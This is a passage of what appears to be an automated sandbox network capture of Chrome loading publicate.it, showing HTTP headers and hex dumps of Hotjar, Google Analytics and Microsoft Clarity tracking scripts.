                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 31385
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Thu, 25 Jul 2024 07:28:40 GMT
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        x-amz-version-id: GKyXS2_k_frklts_CJntA9JOOTdXp6OV
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                                                                        ETag: "c9861c1ac17232aeca7ab6802d7a8e19"
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        Via: 1.1 1d087f24771eb6834b16162f1bb01660.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA60-P2
                                                                                                                                                                                                        X-Amz-Cf-Id: NC8Keapu6YLHRlsSGSfSeDcAjfC2oWiar6OTLWY3vWqHpyTlg3qXSw==
                                                                                                                                                                                                        Age: 5
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC15716INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 6e 29 7b 76 61 72 20 65 3d 55 28 29 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 3d 65 5b 6e 5d 7c 7c 7b 69 64 3a 6e 2c 70 6c 75 67 69 6e 73 3a 7b 7d 2c 67 65 74 50 6c 75 67 69 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 65 3d 5b 5d 3b 66 6f 72 28 6e 20 69 6e 20 74 68 69 73 2e 70 6c 75 67 69 6e 73 29 65 2e 70 75 73 68 28 74 68 69 73 2e 70 6c 75 67 69 6e 73 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 61 75 74 6f 54 72 61 63 6b 69 6e 67 49 6e 69 74 69 61 6c 69 7a 65 64 3a 21 31 7d 2c 65 5b 6e 5d 7d 66 75 6e 63 74 69 6f 6e 20 50 28 6e 2c 65 29 7b 6e 3d 63 28 6e 29 3b 72 65 74 75 72 6e 20 6e 2e 70 6c 75 67 69 6e 73 5b 65 5d 3d 6e 2e 70 6c 75 67
                                                                                                                                                                                                        Data Ascii: !function(){"use strict";function c(n){var e=U();return e[n]=e[n]||{id:n,plugins:{},getPlugins:function(){var n,e=[];for(n in this.plugins)e.push(this.plugins[n]);return e},autoTrackingInitialized:!1},e[n]}function P(n,e){n=c(n);return n.plugins[e]=n.plug
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC15669INData Raw: 6e 29 29 72 65 74 75 72 6e 20 6e 7d 77 68 69 6c 65 28 65 3d 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 65 3d 28 6e 3d 65 29 3f 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 6e 75 6c 6c 2c 74 2b 2b 2c 6e 75 6c 6c 21 3d 3d 65 26 26 74 3c 31 30 30 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 6e 3d 6e 2e 74 61 72 67 65 74 29 29 26 26 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 69 66 28 5f 65 28 65 3d 53 74 72 69 6e 67 28 65 29 29 29 7b 76 61 72 20 74 3d 6e 2e 68 6f 73 74 6e 61 6d 65 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 69 3d 4e 28 29 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 4c 69 6e 6b 69 6e 67 2e 61 6c 6c
                                                                                                                                                                                                        Data Ascii: n))return n}while(e=n.parentNode,e=(n=e)?n.parentNode:null,t++,null!==e&&t<100);return null}(n=n.target))&&function(n){var e=n.getAttribute("href");if(!e)return;if(_e(e=String(e))){var t=n.hostname,r=document.location.hostname,i=N().crossDomainLinking.all


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        108192.168.2.54988618.239.94.1214436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC365OUTGET /c/hotjar-2431713.js?sv=7 HTTP/1.1
                                                                                                                                                                                                        Host: static.hotjar.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC639INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:22 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        ETag: W/b30f074cd7f59b1b60b0526838dae4cf
                                                                                                                                                                                                        Strict-Transport-Security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                        X-Cache-Hit: 1
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        Via: 1.1 7cbec639ed3557aac04425ec5a5f177a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                        X-Amz-Cf-Id: OIRC1BEkJyReLcfwhzKtkbroMkZy343XjANr2Rsa2bLYWiO6K3mXKA==
                                                                                                                                                                                                        Age: 3
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC11153INData Raw: 32 62 38 39 0d 0a 77 69 6e 64 6f 77 2e 68 6a 53 69 74 65 53 65 74 74 69 6e 67 73 20 3d 20 77 69 6e 64 6f 77 2e 68 6a 53 69 74 65 53 65 74 74 69 6e 67 73 20 7c 7c 20 7b 22 73 69 74 65 5f 69 64 22 3a 32 34 33 31 37 31 33 2c 22 72 22 3a 30 2e 34 36 36 33 37 31 36 31 37 38 39 30 32 31 31 36 2c 22 72 65 63 5f 76 61 6c 75 65 22 3a 30 2e 32 30 35 2c 22 73 74 61 74 65 5f 63 68 61 6e 67 65 5f 6c 69 73 74 65 6e 5f 6d 6f 64 65 22 3a 22 61 75 74 6f 6d 61 74 69 63 22 2c 22 72 65 63 6f 72 64 22 3a 74 72 75 65 2c 22 63 6f 6e 74 69 6e 75 6f 75 73 5f 63 61 70 74 75 72 65 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 72 65 63 6f 72 64 69 6e 67 5f 63 61 70 74 75 72 65 5f 6b 65 79 73 74 72 6f 6b 65 73 22 3a 74 72 75 65 2c 22 73 65 73 73 69 6f 6e 5f 63 61 70 74 75 72 65 5f
                                                                                                                                                                                                        Data Ascii: 2b89window.hjSiteSettings = window.hjSiteSettings || {"site_id":2431713,"r":0.4663716178902116,"rec_value":0.205,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":true,"session_capture_
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        109192.168.2.54988913.227.219.714436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC544OUTGET /modules.8da33a8f469c3b5ffcec.js HTTP/1.1
                                                                                                                                                                                                        Host: script.hotjar.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Content-Length: 228656
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Tue, 30 Jul 2024 14:23:14 GMT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        ETag: "c2dfd31730d4205be9a853a199a98876"
                                                                                                                                                                                                        Last-Modified: Tue, 30 Jul 2024 14:22:40 GMT
                                                                                                                                                                                                        Strict-Transport-Security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        X-Robots-Tag: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        Via: 1.1 b8eaad25e4131c15c21d3d50aac2684c.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                        X-Amz-Cf-Id: PKiRef0uS77avgKD967uO-csTevY4KDAneXqHH9txQPVwBj7PF0CUw==
                                                                                                                                                                                                        Age: 2685191
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC15664INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6d 6f 64 75 6c 65 73 2e 38 64 61 33 33 61 38 66 34 36 39 63 33 62 35 66 66 63 65 63 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 34 37 38 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 63 6f 6e 73 74 20 72 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 49 44 45 4e 54 49 46 59 5f 55 53 45 52 3a 22 69 64 65 6e 74 69 66 79 5f 75 73 65 72 22 2c 41 55 54 4f 54 41 47 5f 52 45 43 4f 52 44 49 4e 47 3a 22 61 75 74 6f 74 61 67 5f 72 65 63 6f
                                                                                                                                                                                                        Data Ascii: /*! For license information please see modules.8da33a8f469c3b5ffcec.js.LICENSE.txt */!function(){var e={4788:function(e,t,n){"use strict";n.d(t,{s:function(){return r}});const r=Object.freeze({IDENTIFY_USER:"identify_user",AUTOTAG_RECORDING:"autotag_reco
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 69 6e 69 74 56 6f 43 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 2c 72 75 6e 57 69 64 67 65 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 39 36 36 33 29 2c 6f 3d 6e 28 39 37 38 30 29 2c 69 3d 7b 67 65 74 41 73 4e 75 6d 62 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 68 6a 2e 62 72 69 64 67 65 2e 67 65 74 53 65 73 73 69 6f 6e 55 73 65 72 49 64 28 21 30 29 3b 72 65 74 75 72 6e 28 70 61 72 73 65 49 6e 74 28 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73 6c 69 63 65 28 2d 31 30 29 29 7c 7c 22 22 2c 31 36 29 2b 31 29 2f 4d 61 74 68 2e
                                                                                                                                                                                                        Data Ascii: function(e,t,n){"use strict";n.r(t),n.d(t,{initVoC:function(){return S},runWidgets:function(){return _}});var r=n(9663),o=n(9780),i={getAsNumber:function(){var e=hj.bridge.getSessionUserId(!0);return(parseInt((null==e?void 0:e.slice(-10))||"",16)+1)/Math.
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 2c 74 26 26 68 6a 2e 74 72 79 43 61 74 63 68 28 74 2c 22 47 72 61 6e 74 43 6f 6e 73 65 6e 74 22 29 28 63 2e 67 72 61 6e 74 65 64 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 67 72 61 6e 74 65 64 3d 21 31 7d 29 29 7d 29 2c 22 68 6a 2e 72 65 71 75 65 73 74 2e 67 65 74 43 6f 6e 73 65 6e 74 22 29 2c 73 2e 73 61 76 65 46 65 65 64 62 61 63 6b 52 65 73 70 6f 6e 73 65 3d 68 6a 2e 74 72 79 43 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6f 29 7b 65 2e 61 63 74 69 6f 6e 3d 22 66 65 65 64 62 61 63 6b 5f 77 69 64 67 65 74 5f 72 65 73 70 6f 6e 73 65 22 2c 68 6a 2e 65 76 65 6e 74 2e 73 69 67 6e 61 6c 28 22 66 65 65 64 62 61 63 6b 2e 73 65 6e 64 22 2c 7b 69 64 3a 74 7d 29 2c 66 28 22 22 2e 63 6f 6e 63 61 74 28 6e 2e 76 31 2c 22 2f 63 6c 69 65
                                                                                                                                                                                                        Data Ascii: ,t&&hj.tryCatch(t,"GrantConsent")(c.granted)}),(function(){c.granted=!1}))}),"hj.request.getConsent"),s.saveFeedbackResponse=hj.tryCatch((function(e,t,r,o){e.action="feedback_widget_response",hj.event.signal("feedback.send",{id:t}),f("".concat(n.v1,"/clie
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 72 3d 6e 2e 69 6e 63 6c 75 64 65 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 26 26 72 2e 63 61 6c 6c 28 6e 2c 68 29 3f 6e 75 6c 6c 3d 3d 3d 28 73 3d 6d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 7c 7c 6e 75 6c 6c 3d 3d 3d 28 63 3d 73 2e 72 65 70 6c 61 63 65 41 6c 6c 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 63 61 6c 6c 28 73 2c 68 2c 22 22 29 3a 6d 29 7d 29 2c 22 63 6f 6d 6d 6f 6e 22 29 2c 75 3d 68 6a 2e 74 72 79 43 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 67 65 74 28 30 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 22 22 29 2c 65 2e 69 73 28 22 68 74 6d 6c 22 29 29 72 65 74 75 72 6e 22 68 74 6d 6c 22 2b 6e 3b 76 61 72 20 6f 3d 5f 28
                                                                                                                                                                                                        Data Ascii: r=n.includes)&&void 0!==r&&r.call(n,h)?null===(s=m)||void 0===s||null===(c=s.replaceAll)||void 0===c?void 0:c.call(s,h,""):m)}),"common"),u=hj.tryCatch((function(e,n){var r=e.get(0);if(!r)return n;if(void 0===n&&(n=""),e.is("html"))return"html"+n;var o=_(
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 6f 6e 28 74 29 7b 74 2e 6c 69 73 74 65 6e 28 65 29 7d 29 29 2c 68 6a 2e 61 75 74 6f 74 61 67 2e 73 74 61 72 74 28 29 7d 29 2c 22 62 65 68 61 76 69 6f 72 2d 64 61 74 61 2e 65 76 65 6e 74 73 2e 65 6e 61 62 6c 65 52 65 63 6f 72 64 69 6e 67 22 29 7d 2c 57 3d 6e 28 35 35 34 37 29 2c 7a 3d 6e 28 33 38 38 33 29 2c 42 3d 6e 28 37 32 34 29 3b 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 72 65 74 75 72 6e 20 46 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 4f 62 6a 65
                                                                                                                                                                                                        Data Ascii: on(t){t.listen(e)})),hj.autotag.start()}),"behavior-data.events.enableRecording")},W=n(5547),z=n(3883),B=n(724);function F(){return F=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Obje
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 28 65 2c 6e 29 7b 76 61 72 20 72 3d 74 2e 6e 6f 64 65 49 64 28 65 29 3b 74 2e 6e 6f 64 65 73 5b 72 5d 3d 65 2c 74 2e 76 61 6c 75 65 73 5b 72 5d 3d 6e 7d 29 2c 22 4e 6f 64 65 4d 61 70 2e 73 65 74 22 29 2c 74 68 69 73 2e 67 65 74 3d 68 6a 2e 74 72 79 43 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 2e 6e 6f 64 65 49 64 28 65 29 3b 72 65 74 75 72 6e 20 74 2e 76 61 6c 75 65 73 5b 6e 5d 7d 29 2c 22 4e 6f 64 65 4d 61 70 2e 67 65 74 22 29 2c 74 68 69 73 2e 68 61 73 3d 68 6a 2e 74 72 79 43 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 6e 6f 64 65 49 64 28 65 29 69 6e 20 74 2e 6e 6f 64 65 73 7d 29 2c 22 4e 6f 64 65 4d 61 70 2e 68 61 73 22 29 2c 74 68 69 73 2e 64 65 6c 65 74 65 4e 6f 64 65 3d 68 6a 2e
                                                                                                                                                                                                        Data Ascii: (e,n){var r=t.nodeId(e);t.nodes[r]=e,t.values[r]=n}),"NodeMap.set"),this.get=hj.tryCatch((function(e){var n=t.nodeId(e);return t.values[n]}),"NodeMap.get"),this.has=hj.tryCatch((function(e){return t.nodeId(e)in t.nodes}),"NodeMap.has"),this.deleteNode=hj.
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 65 54 79 70 65 3a 65 2e 6e 6f 64 65 54 79 70 65 2c 69 64 3a 61 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 68 61 64 6f 77 52 6f 6f 74 2c 6e 3d 65 2e 67 65 74 4e 65 78 74 49 64 2c 72 3d 7b 7d 3b 69 66 28 21 74 29 72 65 74 75 72 6e 20 72 3b 69 66 28 72 2e 68 61 73 53 68 61 64 6f 77 52 6f 6f 74 3d 21 30 2c 72 2e 69 73 53 79 6e 74 68 65 74 69 63 53 68 61 64 6f 77 3d 21 21 74 2e 73 79 6e 74 68 65 74 69 63 2c 74 2e 61 64 6f 70 74 65 64 53 74 79 6c 65 53 68 65 65 74 73 26 26 74 2e 61 64 6f 70 74 65 64 53 74 79 6c 65 53 68 65 65 74 73 2e 6c 65 6e 67 74 68 3e 30 29 7b 76 61 72 20 6f 3d 74 2e 61 64 6f 70 74 65 64 53 74 79 6c 65 53 68 65 65 74 73 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 6f
                                                                                                                                                                                                        Data Ascii: eType:e.nodeType,id:a},function(e){var t=e.shadowRoot,n=e.getNextId,r={};if(!t)return r;if(r.hasShadowRoot=!0,r.isSyntheticShadow=!!t.synthetic,t.adoptedStyleSheets&&t.adoptedStyleSheets.length>0){var o=t.adoptedStyleSheets.reduce((function(e,r){for(var o
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 74 72 69 62 75 74 65 73 2e 72 65 6c 2e 76 61 6c 75 65 26 26 22 68 72 65 66 22 69 6e 20 65 2e 61 74 74 72 69 62 75 74 65 73 26 26 30 3d 3d 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2e 68 72 65 66 2e 76 61 6c 75 65 2e 69 6e 64 65 78 4f 66 28 22 62 6c 6f 62 3a 22 29 26 26 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 72 3d 68 6a 2e 73 65 6c 65 63 74 6f 72 28 29 2e 67 65 74 28 68 6a 2e 68 71 28 65 29 29 2c 6f 3d 68 6a 2e 74 72 65 65 4d 69 72 72 6f 72 2e 67 65 74 4e 6f 64 65 49 64 28 65 29 2c 69 3d 30 2c 61 3d 65 2e 73 68 65 65 74 2e 63 73 73 52 75 6c 65 73 2e 6c 65 6e 67 74 68 3b 69 3c 61 3b 69 2b 2b 29 6e 2e 70 75 73 68 28 7b 70 61 72 65 6e 74 53 65 6c 65 63 74 6f 72 3a 72 2c 72 75 6c 65 3a 65 2e 73 68 65 65 74 2e
                                                                                                                                                                                                        Data Ascii: tributes.rel.value&&"href"in e.attributes&&0===e.attributes.href.value.indexOf("blob:")&&setTimeout((function(){for(var r=hj.selector().get(hj.hq(e)),o=hj.treeMirror.getNodeId(e),i=0,a=e.sheet.cssRules.length;i<a;i++)n.push({parentSelector:r,rule:e.sheet.
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 71 75 65 75 65 28 65 29 2c 74 2e 63 6c 6f 73 65 28 29 7d 7d 29 2e 70 69 70 65 54 68 72 6f 75 67 68 28 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 53 74 72 65 61 6d 29 2e 70 69 70 65 54 68 72 6f 75 67 68 28 6e 65 77 20 43 6f 6d 70 72 65 73 73 69 6f 6e 53 74 72 65 61 6d 28 22 67 7a 69 70 22 29 29 2c 72 3d 6e 2e 67 65 74 52 65 61 64 65 72 28 29 2c 6f 3d 5b 5d 2c 69 3d 68 6a 2e 6d 65 74 72 69 63 73 2e 74 69 6d 65 57 61 74 63 68 65 72 28 29 2c 72 2e 72 65 61 64 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 6e 3d 74 2e 64 6f 6e 65 2c 61 3d 74 2e 76 61 6c 75 65 3b 69 66 28 69 2e 73 74 61 72 74 28 29 2c 6e 29 7b 76 61 72 20 73 3d 6f 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b
                                                                                                                                                                                                        Data Ascii: queue(e),t.close()}}).pipeThrough(new TextEncoderStream).pipeThrough(new CompressionStream("gzip")),r=n.getReader(),o=[],i=hj.metrics.timeWatcher(),r.read().then((function e(t){var n=t.done,a=t.value;if(i.start(),n){var s=o.reduce((function(e,t){return e+
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 65 3d 22 5f 68 6a 53 61 66 65 43 6f 6e 74 65 78 74 22 2c 65 2e 74 61 62 49 6e 64 65 78 3d 2d 31 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 2c 65 2e 73 72 63 3d 22 61 62 6f 75 74 3a 62 6c 61 6e 6b 22 2c 65 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 64 69 73 70 6c 61 79 22 2c 22 6e 6f 6e 65 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 65 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 77 69 64 74 68 22 2c 22 31 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 65 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 68 65 69 67 68 74 22 2c 22 31 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 65 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28
                                                                                                                                                                                                        Data Ascii: e="_hjSafeContext",e.tabIndex=-1,e.setAttribute("aria-hidden","true"),e.src="about:blank",e.style.setProperty("display","none","important"),e.style.setProperty("width","1px","important"),e.style.setProperty("height","1px","important"),e.style.setProperty(


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        110192.168.2.54989474.125.133.1564436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC822OUTPOST /g/collect?v=2&tid=G-8ML5ENYGMT&cid=1381680606.1725034579&gtm=45je48s0v887450065z8850968419za200zb850968419&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=0 HTTP/1.1
                                                                                                                                                                                                        Host: stats.g.doubleclick.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC446INHTTP/1.1 204 No Content
                                                                                                                                                                                                        Access-Control-Allow-Origin: https://publicate.it
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        111192.168.2.54989613.107.246.454436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC594OUTGET /s/0.7.45/clarity.js HTTP/1.1
                                                                                                                                                                                                        Host: www.clarity.ms
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
